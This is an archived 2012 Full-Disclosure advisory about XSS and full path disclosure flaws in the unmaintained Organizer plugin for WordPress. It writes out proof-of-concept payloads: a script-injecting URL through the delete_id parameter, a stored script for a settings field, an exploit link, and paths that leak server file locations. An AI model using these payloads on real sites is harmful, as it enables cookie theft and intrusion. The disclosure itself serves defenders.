| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sun, 22 Apr 2012 23:51:49 +0300 From: "MustLive" <mustlive@...security.com.ua> To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk> Subject: XSS and FPD vulnerabilities in Organizer for WordPress Hello list! I want to warn you about multiple security vulnerabilities in plugin Organizer for WordPress. This is the first in series of advisories concerning vulnerabilities in this plugin. These are Cross-Site Scripting (reflected and persistent) and Full path disclosure vulnerabilities. ------------------------- Affected products: ------------------------- Vulnerable are Organizer 1.2.1 and previous versions. As answered me the developer of the plugin, he doesn't support it anymore and will no be fixing multiple vulnerabilities in it, about which I've informed him (these and many other vulnerabilities). ---------- Details: ---------- XSS (WASC-08): http://site/wp-admin/admin.php?page=organizer/page/users.php&delete_id=%3Cscript%3Ealert(document.cookie)%3C/script%3E XSS (Persistent) (WASC-08): POST request at page http://site/wp-admin/admin.php?page=organizer/page/users.php <script>alert(document.cookie)</script> In field: "File extensions allowed". Code will execute at the page users.php of the plugin. Exploit: http://websecurity.com.ua/uploads/2012/Organizer%20XSS-1.html Full path disclosure (WASC-13): http://site/wp-content/plugins/organizer/plugin_hook.php http://site/wp-content/plugins/organizer/page/index.php http://site/wp-content/plugins/organizer/page/dir.php http://site/wp-content/plugins/organizer/page/options.php http://site/wp-content/plugins/organizer/page/resize.php http://site/wp-content/plugins/organizer/page/upload.php http://site/wp-content/plugins/organizer/page/users.php http://site/wp-content/plugins/organizer/page/view.php ------------ Timeline: ------------ 2012.04.14 - announced at my site (http://websecurity.com.ua/5782/). 2012.04.15 - informed the developer. 2012.04.17 - the developer answered, that he didn't support the plugin anymore. 2012.04.21 - disclosed at my site. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists